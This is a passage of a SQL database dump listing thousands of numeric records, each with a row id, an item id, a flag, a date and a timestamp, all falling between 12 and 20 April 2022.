20:39:16'),(49330,1606,1,'2022-04-12','2022-04-12 20:58:41'),(49331,4457,1,'2022-04-12','2022-04-12 21:12:51'),(49332,1584,1,'2022-04-12','2022-04-12 21:17:40'),(49333,1596,1,'2022-04-12','2022-04-12 21:17:42'),(49334,3127,1,'2022-04-12','2022-04-12 22:00:58'),(49335,3107,1,'2022-04-12','2022-04-12 22:19:03'),(49336,3107,1,'2022-04-12','2022-04-12 22:27:28'),(49337,0,1,'2022-04-13','2022-04-13 00:13:57'),(49338,2411,1,'2022-04-13','2022-04-13 00:35:39'),(49339,4424,1,'2022-04-13','2022-04-13 01:17:37'),(49340,1596,1,'2022-04-13','2022-04-13 02:19:42'),(49341,1737,1,'2022-04-13','2022-04-13 02:51:02'),(49342,1600,1,'2022-04-13','2022-04-13 04:31:18'),(49343,1872,1,'2022-04-13','2022-04-13 04:36:35'),(49344,76,1,'2022-04-13','2022-04-13 04:37:14'),(49345,4524,1,'2022-04-13','2022-04-13 05:02:05'),(49346,4420,1,'2022-04-13','2022-04-13 05:09:29'),(49347,4420,1,'2022-04-13','2022-04-13 05:16:34'),(49348,4420,1,'2022-04-13','2022-04-13 05:17:43'),(49349,1872,1,'2022-04-13','2022-04-13 05:39:52'),(49350,3313,1,'2022-04-13','2022-04-13 05:57:48'),(49351,3313,1,'2022-04-13','2022-04-13 06:28:10'),(49352,1602,1,'2022-04-13','2022-04-13 07:29:46'),(49353,1602,1,'2022-04-13','2022-04-13 07:33:31'),(49354,4420,1,'2022-04-13','2022-04-13 09:12:45'),(49355,1602,1,'2022-04-13','2022-04-13 10:19:46'),(49356,1602,1,'2022-04-13','2022-04-13 10:19:56'),(49357,2297,1,'2022-04-13','2022-04-13 12:46:14'),(49358,3664,1,'2022-04-13','2022-04-13 12:52:53'),(49359,1728,1,'2022-04-13','2022-04-13 14:35:52'),(49360,1728,1,'2022-04-13','2022-04-13 14:53:01'),(49361,2965,1,'2022-04-13','2022-04-13 14:58:50'),(49362,1703,1,'2022-04-13','2022-04-13 15:02:49'),(49363,1594,1,'2022-04-13','2022-04-13 15:46:10'),(49364,1602,1,'2022-04-13','2022-04-13 17:12:30'),(49365,3313,1,'2022-04-13','2022-04-13 17:16:26'),(49366,4457,1,'2022-04-13','2022-04-13 17:20:34'),(49367,91,1,'2022-04-13','2022-04-13 17:22:53'),(49368,4556,1,'2022-04-13','2022-04-13 17:23:44'),(49369,4556,1,'2022-04-13','2022-04-13 17:23:44'),(49370,91,1,'2022-04-13','2022-04-13 17:24:51'),(49371,87,1,'2022-04-13','2022-04-13 17:32:19'),(49372,4524,1,'2022-04-13','2022-04-13 17:47:50'),(49373,3731,1,'2022-04-13','2022-04-13 17:56:43'),(49374,2609,1,'2022-04-13','2022-04-13 17:58:03'),(49375,2609,1,'2022-04-13','2022-04-13 17:58:43'),(49376,2609,1,'2022-04-13','2022-04-13 17:59:16'),(49377,1586,1,'2022-04-13','2022-04-13 18:58:34'),(49378,3030,1,'2022-04-13','2022-04-13 19:48:03'),(49379,1877,1,'2022-04-13','2022-04-13 20:18:18'),(49380,3746,1,'2022-04-13','2022-04-13 20:26:09'),(49381,1586,1,'2022-04-13','2022-04-13 21:28:10'),(49382,1602,1,'2022-04-13','2022-04-13 22:22:49'),(49383,1596,1,'2022-04-13','2022-04-13 22:41:23'),(49384,3107,1,'2022-04-13','2022-04-13 23:22:57'),(49385,3691,1,'2022-04-13','2022-04-13 23:55:58'),(49386,2411,1,'2022-04-14','2022-04-14 00:09:31'),(49387,4566,1,'2022-04-14','2022-04-14 00:40:49'),(49388,1872,1,'2022-04-14','2022-04-14 01:25:59'),(49389,2411,1,'2022-04-14','2022-04-14 01:38:15'),(49390,1600,1,'2022-04-14','2022-04-14 01:59:07'),(49391,4517,1,'2022-04-14','2022-04-14 02:12:07'),(49392,488,1,'2022-04-14','2022-04-14 02:24:17'),(49393,1602,1,'2022-04-14','2022-04-14 02:57:44'),(49394,1722,1,'2022-04-14','2022-04-14 03:44:59'),(49395,1722,1,'2022-04-14','2022-04-14 03:45:17'),(49396,1722,1,'2022-04-14','2022-04-14 03:45:34'),(49397,1608,1,'2022-04-14','2022-04-14 04:39:00'),(49398,3752,1,'2022-04-14','2022-04-14 04:49:21'),(49399,1600,1,'2022-04-14','2022-04-14 05:07:24'),(49400,1592,1,'2022-04-14','2022-04-14 05:09:31'),(49401,4524,1,'2022-04-14','2022-04-14 05:30:14'),(49402,1602,1,'2022-04-14','2022-04-14 05:33:49'),(49403,1877,1,'2022-04-14','2022-04-14 05:45:59'),(49404,4454,1,'2022-04-14','2022-04-14 06:08:06'),(49405,1877,1,'2022-04-14','2022-04-14 06:08:09'),(49406,4582,1,'2022-04-14','2022-04-14 06:30:05'),(49407,1586,1,'2022-04-14','2022-04-14 07:09:05'),(49408,1872,1,'2022-04-14','2022-04-14 07:15:03'),(49409,1745,1,'2022-04-14','2022-04-14 07:37:37'),(49410,3752,1,'2022-04-14','2022-04-14 07:38:42'),(49411,3041,1,'2022-04-14','2022-04-14 07:40:54'),(49412,1741,1,'2022-04-14','2022-04-14 08:00:05'),(49413,4582,1,'2022-04-14','2022-04-14 08:23:07'),(49414,1600,1,'2022-04-14','2022-04-14 09:19:01'),(49415,3087,1,'2022-04-14','2022-04-14 10:00:40'),(49416,1612,1,'2022-04-14','2022-04-14 10:13:54'),(49417,1614,1,'2022-04-14','2022-04-14 10:33:54'),(49418,3271,1,'2022-04-14','2022-04-14 10:36:06'),(49419,2150,1,'2022-04-14','2022-04-14 10:37:03'),(49420,1722,1,'2022-04-14','2022-04-14 11:33:47'),(49421,1722,1,'2022-04-14','2022-04-14 11:34:28'),(49422,1722,1,'2022-04-14','2022-04-14 11:35:27'),(49423,1722,1,'2022-04-14','2022-04-14 11:36:49'),(49424,2297,1,'2022-04-14','2022-04-14 12:02:39'),(49425,2769,1,'2022-04-14','2022-04-14 12:13:38'),(49426,80,1,'2022-04-14','2022-04-14 12:17:30'),(49427,2769,1,'2022-04-14','2022-04-14 12:18:17'),(49428,1598,1,'2022-04-14','2022-04-14 12:33:02'),(49429,68,1,'2022-04-14','2022-04-14 12:33:09'),(49430,108,1,'2022-04-14','2022-04-14 12:33:13'),(49431,1596,1,'2022-04-14','2022-04-14 12:33:56'),(49432,1608,1,'2022-04-14','2022-04-14 12:34:01'),(49433,3664,1,'2022-04-14','2022-04-14 12:35:48'),(49434,4566,1,'2022-04-14','2022-04-14 12:56:41'),(49435,3664,1,'2022-04-14','2022-04-14 13:17:31'),(49436,4416,1,'2022-04-14','2022-04-14 13:18:03'),(49437,3107,1,'2022-04-14','2022-04-14 13:18:04'),(49438,4332,1,'2022-04-14','2022-04-14 13:30:40'),(49439,473,1,'2022-04-14','2022-04-14 13:32:56'),(49440,1588,1,'2022-04-14','2022-04-14 13:38:03'),(49441,4524,1,'2022-04-14','2022-04-14 13:40:35'),(49442,1598,1,'2022-04-14','2022-04-14 14:03:10'),(49443,3041,1,'2022-04-14','2022-04-14 14:03:45'),(49444,1602,1,'2022-04-14','2022-04-14 14:48:01'),(49445,2411,1,'2022-04-14','2022-04-14 14:48:53'),(49446,4420,1,'2022-04-14','2022-04-14 14:50:14'),(49447,72,1,'2022-04-14','2022-04-14 15:01:20'),(49448,1602,1,'2022-04-14','2022-04-14 15:03:11'),(49449,3253,1,'2022-04-14','2022-04-14 15:39:29'),(49450,1872,1,'2022-04-14','2022-04-14 15:48:28'),(49451,1877,1,'2022-04-14','2022-04-14 16:18:02'),(49452,1877,1,'2022-04-14','2022-04-14 16:24:07'),(49453,4517,1,'2022-04-14','2022-04-14 16:33:04'),(49454,1695,1,'2022-04-14','2022-04-14 16:44:30'),(49455,4332,1,'2022-04-14','2022-04-14 16:45:00'),(49456,1711,1,'2022-04-14','2022-04-14 16:50:49'),(49457,4517,1,'2022-04-14','2022-04-14 16:52:04'),(49458,4582,1,'2022-04-14','2022-04-14 16:57:23'),(49459,1600,1,'2022-04-14','2022-04-14 16:59:22'),(49460,1600,1,'2022-04-14','2022-04-14 16:59:23'),(49461,1600,1,'2022-04-14','2022-04-14 17:00:24'),(49462,2617,1,'2022-04-14','2022-04-14 17:08:05'),(49463,4323,1,'2022-04-14','2022-04-14 17:22:55'),(49464,1600,1,'2022-04-14','2022-04-14 17:26:15'),(49465,4524,1,'2022-04-14','2022-04-14 17:56:38'),(49466,1741,1,'2022-04-14','2022-04-14 18:11:57'),(49467,1600,1,'2022-04-14','2022-04-14 18:33:06'),(49468,3489,1,'2022-04-14','2022-04-14 18:36:37'),(49469,3087,1,'2022-04-14','2022-04-14 20:08:16'),(49470,3482,1,'2022-04-14','2022-04-14 20:17:39'),(49471,3531,1,'2022-04-14','2022-04-14 21:00:24'),(49472,4275,1,'2022-04-14','2022-04-14 21:04:10'),(49473,487,1,'2022-04-14','2022-04-14 21:24:11'),(49474,473,1,'2022-04-14','2022-04-14 21:24:12'),(49475,3092,1,'2022-04-14','2022-04-14 22:36:48'),(49476,1544,1,'2022-04-14','2022-04-14 23:18:16'),(49477,1596,1,'2022-04-14','2022-04-14 23:48:41'),(49478,1584,1,'2022-04-14','2022-04-14 23:48:43'),(49479,108,1,'2022-04-15','2022-04-15 00:13:20'),(49480,1594,1,'2022-04-15','2022-04-15 00:21:14'),(49481,4424,1,'2022-04-15','2022-04-15 00:34:24'),(49482,3072,1,'2022-04-15','2022-04-15 00:34:28'),(49483,4492,1,'2022-04-15','2022-04-15 00:41:22'),(49484,3271,1,'2022-04-15','2022-04-15 00:56:54'),(49485,108,1,'2022-04-15','2022-04-15 01:20:18'),(49486,488,1,'2022-04-15','2022-04-15 01:22:20'),(49487,3271,1,'2022-04-15','2022-04-15 02:04:20'),(49488,1614,1,'2022-04-15','2022-04-15 02:28:00'),(49489,3072,1,'2022-04-15','2022-04-15 02:53:41'),(49490,91,1,'2022-04-15','2022-04-15 03:33:49'),(49491,3107,1,'2022-04-15','2022-04-15 03:33:53'),(49492,68,1,'2022-04-15','2022-04-15 03:33:54'),(49493,68,1,'2022-04-15','2022-04-15 03:33:58'),(49494,2411,1,'2022-04-15','2022-04-15 04:19:05'),(49495,1600,1,'2022-04-15','2022-04-15 05:28:03'),(49496,4524,1,'2022-04-15','2022-04-15 05:37:04'),(49497,1877,1,'2022-04-15','2022-04-15 05:46:03'),(49498,4520,1,'2022-04-15','2022-04-15 06:04:11'),(49499,3253,1,'2022-04-15','2022-04-15 06:13:53'),(49500,1741,1,'2022-04-15','2022-04-15 06:13:58'),(49501,3253,1,'2022-04-15','2022-04-15 06:14:12'),(49502,3253,1,'2022-04-15','2022-04-15 06:14:42'),(49503,3788,1,'2022-04-15','2022-04-15 06:33:02'),(49504,2309,1,'2022-04-15','2022-04-15 06:40:16'),(49505,1600,1,'2022-04-15','2022-04-15 07:18:33'),(49506,3124,1,'2022-04-15','2022-04-15 07:28:28'),(49507,4520,1,'2022-04-15','2022-04-15 07:34:13'),(49508,1598,1,'2022-04-15','2022-04-15 09:23:53'),(49509,1586,1,'2022-04-15','2022-04-15 09:51:52'),(49510,4514,1,'2022-04-15','2022-04-15 10:07:03'),(49511,1586,1,'2022-04-15','2022-04-15 10:13:26'),(49512,1722,1,'2022-04-15','2022-04-15 10:34:09'),(49513,1722,1,'2022-04-15','2022-04-15 10:34:31'),(49514,1722,1,'2022-04-15','2022-04-15 10:35:54'),(49515,1598,1,'2022-04-15','2022-04-15 10:54:24'),(49516,1594,1,'2022-04-15','2022-04-15 11:32:01'),(49517,3271,1,'2022-04-15','2022-04-15 11:52:48'),(49518,1612,1,'2022-04-15','2022-04-15 12:08:40'),(49519,91,1,'2022-04-15','2022-04-15 12:13:54'),(49520,2769,1,'2022-04-15','2022-04-15 12:24:36'),(49521,1612,1,'2022-04-15','2022-04-15 12:24:54'),(49522,1584,1,'2022-04-15','2022-04-15 13:20:13'),(49523,80,1,'2022-04-15','2022-04-15 13:49:23'),(49524,2813,1,'2022-04-15','2022-04-15 14:14:44'),(49525,1877,1,'2022-04-15','2022-04-15 15:00:31'),(49526,3271,1,'2022-04-15','2022-04-15 15:35:46'),(49527,3253,1,'2022-04-15','2022-04-15 15:45:31'),(49528,4520,1,'2022-04-15','2022-04-15 16:52:11'),(49529,2813,1,'2022-04-15','2022-04-15 17:14:14'),(49530,0,1,'2022-04-15','2022-04-15 17:43:09'),(49531,4520,1,'2022-04-15','2022-04-15 18:30:28'),(49532,1592,1,'2022-04-15','2022-04-15 18:56:27'),(49533,1741,1,'2022-04-15','2022-04-15 19:52:03'),(49534,4323,1,'2022-04-16','2022-04-16 00:10:05'),(49535,1594,1,'2022-04-16','2022-04-16 01:15:14'),(49536,1594,1,'2022-04-16','2022-04-16 01:15:16'),(49537,4520,1,'2022-04-16','2022-04-16 01:26:11'),(49538,3271,1,'2022-04-16','2022-04-16 01:33:09'),(49539,4517,1,'2022-04-16','2022-04-16 01:37:48'),(49540,108,1,'2022-04-16','2022-04-16 02:11:11'),(49541,1598,1,'2022-04-16','2022-04-16 02:11:20'),(49542,4514,1,'2022-04-16','2022-04-16 02:22:53'),(49543,1584,1,'2022-04-16','2022-04-16 02:56:11'),(49544,4514,1,'2022-04-16','2022-04-16 04:13:03'),(49545,4514,1,'2022-04-16','2022-04-16 05:37:11'),(49546,4566,1,'2022-04-16','2022-04-16 06:22:26'),(49547,68,1,'2022-04-16','2022-04-16 06:48:28'),(49548,1608,1,'2022-04-16','2022-04-16 08:49:51'),(49549,3030,1,'2022-04-16','2022-04-16 08:54:41'),(49550,3072,1,'2022-04-16','2022-04-16 09:56:48'),(49551,3030,1,'2022-04-16','2022-04-16 11:13:50'),(49552,1612,1,'2022-04-16','2022-04-16 11:25:26'),(49553,1766,1,'2022-04-16','2022-04-16 11:32:52'),(49554,1766,1,'2022-04-16','2022-04-16 11:40:14'),(49555,1766,1,'2022-04-16','2022-04-16 11:40:51'),(49556,4457,1,'2022-04-16','2022-04-16 12:05:52'),(49557,1774,1,'2022-04-16','2022-04-16 12:40:25'),(49558,3124,1,'2022-04-16','2022-04-16 12:44:35'),(49559,2297,1,'2022-04-16','2022-04-16 13:14:29'),(49560,477,1,'2022-04-16','2022-04-16 13:28:25'),(49561,1608,1,'2022-04-16','2022-04-16 13:45:29'),(49562,108,1,'2022-04-16','2022-04-16 14:09:59'),(49563,1728,1,'2022-04-16','2022-04-16 14:28:01'),(49564,1612,1,'2022-04-16','2022-04-16 14:33:14'),(49565,76,1,'2022-04-16','2022-04-16 14:34:38'),(49566,76,1,'2022-04-16','2022-04-16 14:35:37'),(49567,76,1,'2022-04-16','2022-04-16 14:35:46'),(49568,1612,1,'2022-04-16','2022-04-16 14:35:50'),(49569,1606,1,'2022-04-16','2022-04-16 14:54:34'),(49570,1582,1,'2022-04-16','2022-04-16 14:56:31'),(49571,3764,1,'2022-04-16','2022-04-16 14:59:30'),(49572,1600,1,'2022-04-16','2022-04-16 15:39:02'),(49573,1584,1,'2022-04-16','2022-04-16 16:10:13'),(49574,87,1,'2022-04-16','2022-04-16 17:37:14'),(49575,91,1,'2022-04-16','2022-04-16 17:37:19'),(49576,2154,1,'2022-04-16','2022-04-16 17:39:04'),(49577,2154,1,'2022-04-16','2022-04-16 17:39:29'),(49578,2154,1,'2022-04-16','2022-04-16 17:39:44'),(49579,84,1,'2022-04-16','2022-04-16 17:42:46'),(49580,1877,1,'2022-04-16','2022-04-16 17:43:09'),(49581,84,1,'2022-04-16','2022-04-16 17:43:31'),(49582,1872,1,'2022-04-16','2022-04-16 17:43:47'),(49583,84,1,'2022-04-16','2022-04-16 17:43:58'),(49584,87,1,'2022-04-16','2022-04-16 17:44:37'),(49585,470,1,'2022-04-16','2022-04-16 17:45:17'),(49586,91,1,'2022-04-16','2022-04-16 17:45:45'),(49587,1602,1,'2022-04-16','2022-04-16 17:57:16'),(49588,1586,1,'2022-04-16','2022-04-16 18:00:52'),(49589,1586,1,'2022-04-16','2022-04-16 18:00:57'),(49590,68,1,'2022-04-16','2022-04-16 18:46:12'),(49591,68,1,'2022-04-16','2022-04-16 19:31:15'),(49592,3245,1,'2022-04-16','2022-04-16 20:27:07'),(49593,4529,1,'2022-04-16','2022-04-16 21:09:17'),(49594,4524,1,'2022-04-16','2022-04-16 21:28:12'),(49595,3072,1,'2022-04-16','2022-04-16 21:50:15'),(49596,4454,1,'2022-04-16','2022-04-16 22:10:33'),(49597,1778,1,'2022-04-16','2022-04-16 23:22:11'),(49598,1778,1,'2022-04-16','2022-04-16 23:22:21'),(49599,1778,1,'2022-04-16','2022-04-16 23:22:42'),(49600,1608,1,'2022-04-17','2022-04-17 00:52:37'),(49601,1608,1,'2022-04-17','2022-04-17 00:55:23'),(49602,3307,1,'2022-04-17','2022-04-17 01:59:40'),(49603,1608,1,'2022-04-17','2022-04-17 02:16:35'),(49604,1606,1,'2022-04-17','2022-04-17 02:22:10'),(49605,3069,1,'2022-04-17','2022-04-17 03:01:28'),(49606,3698,1,'2022-04-17','2022-04-17 03:07:12'),(49607,1606,1,'2022-04-17','2022-04-17 03:10:11'),(49608,2309,1,'2022-04-17','2022-04-17 03:22:31'),(49609,1594,1,'2022-04-17','2022-04-17 04:10:32'),(49610,1877,1,'2022-04-17','2022-04-17 04:28:11'),(49611,3240,1,'2022-04-17','2022-04-17 04:37:30'),(49612,3746,1,'2022-04-17','2022-04-17 06:54:21'),(49613,80,1,'2022-04-17','2022-04-17 07:23:39'),(49614,3752,1,'2022-04-17','2022-04-17 07:28:42'),(49615,4529,1,'2022-04-17','2022-04-17 08:14:12'),(49616,1588,1,'2022-04-17','2022-04-17 08:35:41'),(49617,1544,1,'2022-04-17','2022-04-17 08:52:27'),(49618,487,1,'2022-04-17','2022-04-17 09:29:06'),(49619,488,1,'2022-04-17','2022-04-17 09:29:26'),(49620,487,1,'2022-04-17','2022-04-17 09:29:36'),(49621,4416,1,'2022-04-17','2022-04-17 09:31:48'),(49622,1598,1,'2022-04-17','2022-04-17 09:35:23'),(49623,1594,1,'2022-04-17','2022-04-17 10:18:39'),(49624,4457,1,'2022-04-17','2022-04-17 12:19:08'),(49625,1586,1,'2022-04-17','2022-04-17 12:42:06'),(49626,1608,1,'2022-04-17','2022-04-17 12:45:28'),(49627,3307,1,'2022-04-17','2022-04-17 13:05:11'),(49628,1608,1,'2022-04-17','2022-04-17 13:05:14'),(49629,4517,1,'2022-04-17','2022-04-17 13:30:00'),(49630,3706,1,'2022-04-17','2022-04-17 13:51:29'),(49631,479,1,'2022-04-17','2022-04-17 14:16:08'),(49632,3698,1,'2022-04-17','2022-04-17 14:18:32'),(49633,1600,1,'2022-04-17','2022-04-17 14:36:15'),(49634,1600,1,'2022-04-17','2022-04-17 14:39:14'),(49635,3240,1,'2022-04-17','2022-04-17 15:41:50'),(49636,1741,1,'2022-04-17','2022-04-17 15:46:44'),(49637,1728,1,'2022-04-17','2022-04-17 16:01:44'),(49638,1728,1,'2022-04-17','2022-04-17 16:04:20'),(49639,3781,1,'2022-04-17','2022-04-17 16:09:39'),(49640,1588,1,'2022-04-17','2022-04-17 17:43:40'),(49641,3781,1,'2022-04-17','2022-04-17 19:49:17'),(49642,1594,1,'2022-04-17','2022-04-17 22:48:09'),(49643,1602,1,'2022-04-18','2022-04-18 00:31:02'),(49644,2911,1,'2022-04-18','2022-04-18 00:44:47'),(49645,3752,1,'2022-04-18','2022-04-18 01:25:33'),(49646,4517,1,'2022-04-18','2022-04-18 01:54:58'),(49647,4529,1,'2022-04-18','2022-04-18 02:24:26'),(49648,1600,1,'2022-04-18','2022-04-18 03:56:01'),(49649,1586,1,'2022-04-18','2022-04-18 04:27:03'),(49650,4416,1,'2022-04-18','2022-04-18 05:05:01'),(49651,3764,1,'2022-04-18','2022-04-18 06:20:45'),(49652,3041,1,'2022-04-18','2022-04-18 07:15:51'),(49653,3041,1,'2022-04-18','2022-04-18 07:17:19'),(49654,1598,1,'2022-04-18','2022-04-18 09:10:23'),(49655,3030,1,'2022-04-18','2022-04-18 09:32:07'),(49656,4587,1,'2022-04-18','2022-04-18 09:44:59'),(49657,4587,1,'2022-04-18','2022-04-18 11:07:07'),(49658,4587,1,'2022-04-18','2022-04-18 11:09:52'),(49659,3109,1,'2022-04-18','2022-04-18 11:14:57'),(49660,3109,1,'2022-04-18','2022-04-18 11:15:01'),(49661,4524,1,'2022-04-18','2022-04-18 12:35:10'),(49662,4529,1,'2022-04-18','2022-04-18 12:35:10'),(49663,3764,1,'2022-04-18','2022-04-18 12:35:12'),(49664,1598,1,'2022-04-18','2022-04-18 12:49:08'),(49665,3752,1,'2022-04-18','2022-04-18 12:59:52'),(49666,3752,1,'2022-04-18','2022-04-18 13:09:33'),(49667,4566,1,'2022-04-18','2022-04-18 13:20:28'),(49668,4408,1,'2022-04-18','2022-04-18 13:42:56'),(49669,4524,1,'2022-04-18','2022-04-18 14:04:40'),(49670,1598,1,'2022-04-18','2022-04-18 14:49:45'),(49671,1604,1,'2022-04-18','2022-04-18 15:00:39'),(49672,91,1,'2022-04-18','2022-04-18 15:34:13'),(49673,91,1,'2022-04-18','2022-04-18 15:35:04'),(49674,4591,1,'2022-04-18','2022-04-18 15:35:16'),(49675,4591,1,'2022-04-18','2022-04-18 15:35:17'),(49676,4524,1,'2022-04-18','2022-04-18 15:51:26'),(49677,4566,1,'2022-04-18','2022-04-18 16:45:20'),(49678,1872,1,'2022-04-18','2022-04-18 16:47:18'),(49679,1592,1,'2022-04-18','2022-04-18 16:51:43'),(49680,1872,1,'2022-04-18','2022-04-18 16:59:47'),(49681,3030,1,'2022-04-18','2022-04-18 17:22:32'),(49682,1586,1,'2022-04-18','2022-04-18 18:09:39'),(49683,1586,1,'2022-04-18','2022-04-18 18:12:12'),(49684,1596,1,'2022-04-18','2022-04-18 20:02:21'),(49685,1598,1,'2022-04-18','2022-04-18 21:11:22'),(49686,1610,1,'2022-04-18','2022-04-18 21:30:09'),(49687,1610,1,'2022-04-18','2022-04-18 21:30:10'),(49688,3752,1,'2022-04-18','2022-04-18 22:01:43'),(49689,1586,1,'2022-04-18','2022-04-18 22:02:05'),(49690,4524,1,'2022-04-18','2022-04-18 22:45:15'),(49691,1600,1,'2022-04-18','2022-04-18 23:15:25'),(49692,1600,1,'2022-04-18','2022-04-18 23:45:10'),(49693,4520,1,'2022-04-19','2022-04-19 00:15:10'),(49694,1872,1,'2022-04-19','2022-04-19 01:00:04'),(49695,3746,1,'2022-04-19','2022-04-19 01:45:49'),(49696,1586,1,'2022-04-19','2022-04-19 01:58:14'),(49697,4520,1,'2022-04-19','2022-04-19 02:30:11'),(49698,3691,1,'2022-04-19','2022-04-19 04:22:47'),(49699,3030,1,'2022-04-19','2022-04-19 06:42:46'),(49700,1724,1,'2022-04-19','2022-04-19 07:56:55'),(49701,4457,1,'2022-04-19','2022-04-19 10:09:26'),(49702,1600,1,'2022-04-19','2022-04-19 10:58:36'),(49703,4457,1,'2022-04-19','2022-04-19 11:21:20'),(49704,2769,1,'2022-04-19','2022-04-19 12:30:31'),(49705,72,1,'2022-04-19','2022-04-19 15:18:28'),(49706,2769,1,'2022-04-19','2022-04-19 15:27:12'),(49707,1600,1,'2022-04-19','2022-04-19 15:33:02'),(49708,4520,1,'2022-04-19','2022-04-19 15:42:58'),(49709,1604,1,'2022-04-19','2022-04-19 16:36:35'),(49710,1614,1,'2022-04-19','2022-04-19 16:37:04'),(49711,68,1,'2022-04-19','2022-04-19 16:37:13'),(49712,1604,1,'2022-04-19','2022-04-19 16:37:41'),(49713,1604,1,'2022-04-19','2022-04-19 16:39:46'),(49714,4517,1,'2022-04-19','2022-04-19 16:57:10'),(49715,1602,1,'2022-04-19','2022-04-19 18:32:52'),(49716,1604,1,'2022-04-19','2022-04-19 18:59:43'),(49717,91,1,'2022-04-19','2022-04-19 19:00:07'),(49718,1600,1,'2022-04-19','2022-04-19 19:22:11'),(49719,4457,1,'2022-04-19','2022-04-19 19:53:48'),(49720,89,1,'2022-04-19','2022-04-19 19:55:35'),(49721,89,1,'2022-04-19','2022-04-19 19:56:16'),(49722,3041,1,'2022-04-19','2022-04-19 19:57:07'),(49723,89,1,'2022-04-19','2022-04-19 19:57:51'),(49724,89,1,'2022-04-19','2022-04-19 19:57:55'),(49725,4457,1,'2022-04-19','2022-04-19 19:58:08'),(49726,1598,1,'2022-04-19','2022-04-19 20:27:15'),(49727,4524,1,'2022-04-19','2022-04-19 20:45:43'),(49728,1774,1,'2022-04-19','2022-04-19 20:54:11'),(49729,4457,1,'2022-04-19','2022-04-19 21:57:03'),(49730,3706,1,'2022-04-20','2022-04-20 00:20:25'),(49731,1588,1,'2022-04-20','2022-04-20 00:50:56'),(49732,4582,1,'2022-04-20','2022-04-20 01:20:44'),(49733,4524,1,'2022-04-20','2022-04-20 02:17:25'),(49734,2159,1,'2022-04-20','2022-04-20 05:37:39'),(49735,335,1,'2022-04-20','2022-04-20 07:02:01'),(49736,68,1,'2022-04-20','2022-04-20 07:02:15'),(49737,1703,1,'2022-04-20','2022-04-20 07:32:22'),(49738,91,1,'2022-04-20','2022-04-20 09:04:44'),(49739,4612,1,'2022-04-20','2022-04-20 09:04:54'),(49740,4612,1,'2022-04-20','2022-04-20 09:04:54'),(49741,91,1,'2022-04-20','2022-04-20 09:05:02'),(49742,4612,1,'2022-04-20','2022-04-20 09:05:05'),(49743,4612,1,'2022-04-20','2022-04-20 09:05:06'),(49744,91,1,'2022-04-20','2022-04-20 09:06:04'),(49745,4608,1,'2022-04-20','2022-04-20 09:06:23'),(49746,4608,1,'2022-04-20','2022-04-20 09:06:25'),(49747,2775,1,'2022-04-20','2022-04-20 09:35:36'),(49748,1588,1,'2022-04-20','2022-04-20 09:46:39'),(49749,4457,1,'2022-04-20','2022-04-20 10:11:13'),(49750,1602,1,'2022-04-20','2022-04-20 10:20:32'),(49751,1877,1,'2022-04-20','2022-04-20 10:28:40'),(49752,1602,1,'2022-04-20','2022-04-20 10:32:35'),(49753,74,1,'2022-04-20','2022-04-20 10:36:21'),(49754,1602,1,'2022-04-20','2022-04-20 10:40:05'),(49755,1612,1,'2022-04-20','2022-04-20 10:50:01'),(49756,74,1,'2022-04-20','2022-04-20 10:50:42'),(49757,1612,1,'2022-04-20','2022-04-20 10:51:18'),(49758,3764,1,'2022-04-20','2022-04-20 10:52:11'),(49759,74,1,'2022-04-20','2022-04-20 11:03:06'),(49760,2503,1,'2022-04-20','2022-04-20 11:03:49'),(49761,2503,1,'2022-04-20','2022-04-20 11:03:50'),(49762,1606,1,'2022-04-20','2022-04-20 11:24:32'),(49763,4416,1,'2022-04-20','2022-04-20 11:54:01'),(49764,3752,1,'2022-04-20','2022-04-20 11:58:19'),(49765,74,1,'2022-04-20','2022-04-20 12:07:22'),(49766,2503,1,'2022-04-20','2022-04-20 12:15:24'),(49767,1877,1,'2022-04-20','2022-04-20 12:29:32'),(49768,87,1,'2022-04-20','2022-04-20 12:40:18'),(49769,3069,1,'2022-04-20','2022-04-20 12:42:57'),(49770,480,1,'2022-04-20','2022-04-20 12:43:13'),(49771,91,1,'2022-04-20','2022-04-20 12:45:49'),(49772,4542,1,'2022-04-20','2022-04-20 12:47:29'),(49773,4542,1,'2022-04-20','2022-04-20 12:47:31'),(49774,4542,1,'2022-04-20','2022-04-20 12:47:35'),(49775,2991,1,'2022-04-20','2022-04-20 12:58:17'),(49776,3764,1,'2022-04-20','2022-04-20 13:13:04'),(49777,4608,1,'2022-04-20','2022-04-20 13:16:14'),(49778,570,1,'2022-04-20','2022-04-20 13:51:54'),(49779,1602,1,'2022-04-20','2022-04-20 13:56:53'),(49780,4542,1,'2022-04-20','2022-04-20 14:39:27'),(49781,4608,1,'2022-04-20','2022-04-20 14:45:16'),(49782,4612,1,'2022-04-20','2022-04-20 14:45:57'),(49783,72,1,'2022-04-20','2022-04-20 15:02:56'),(49784,3721,1,'2022-04-20','2022-04-20 15:08:28'),(49785,2911,1,'2022-04-20','2022-04-20 16:19:20'),(49786,3280,1,'2022-04-20','2022-04-20 16:29:25'),(49787,3280,1,'2022-04-20','2022-04-20 16:30:18'),(49788,3280,1,'2022-04-20','2022-04-20 16:30:22'),(49789,3280,1,'2022-04-20','2022-04-20 16:30:29'),(49790,3280,1,'2022-04-20','2022-04-20 16:30:36'),(49791,3280,1,'2022-04-20','2022-04-20 16:30:47'),(49792,3280,1,'2022-04-20','2022-04-20 16:31:00'),(49793,91,1,'2022-04-20','2022-04-20 16:31:34'),(49794,4448,1,'2022-04-20','2022-04-20 16:32:12'),(49795,4448,1,'2022-04-20','2022-04-20 16:32:14'),(49796,91,1,'2022-04-20','2022-04-20 16:33:00'),(49797,4542,1,'2022-04-20','2022-04-20 16:33:14'),(49798,4542,1,'2022-04-20','2022-04-20 16:33:17'),(49799,91,1,'2022-04-20','2022-04-20 16:34:23'),(49800,4444,1,'2022-04-20','2022-04-20 16:34:51'),(49801,4444,1,'2022-04-20','2022-04-20 16:34:53'),(49802,91,1,'2022-04-20','2022-04-20 16:35:24'),(49803,4420,1,'2022-04-20','2022-04-20 16:35:50'),(49804,4420,1,'2022-04-20','2022-04-20 16:35:52'),(49805,91,1,'2022-04-20','2022-04-20 16:36:35'),(49806,4412,1,'2022-04-20','2022-04-20 16:36:52'),(49807,4412,1,'2022-04-20','2022-04-20 16:36:54'),(49808,91,1,'2022-04-20','2022-04-20 16:40:29'),(49809,3280,1,'2022-04-20','2022-04-20 16:42:37'),(49810,91,1,'2022-04-20','2022-04-20 16:42:58'),(49811,3280,1,'2022-04-20','2022-04-20 16:43:24'),(49812,3280,1,'2022-04-20','2022-04-20 16:43:36'),(49813,3280,1,'2022-04-20','2022-04-20 16:43:47'),(49814,91,1,'2022-04-20','2022-04-20 16:44:02'),(49815,3280,1,'2022-04-20','2022-04-20 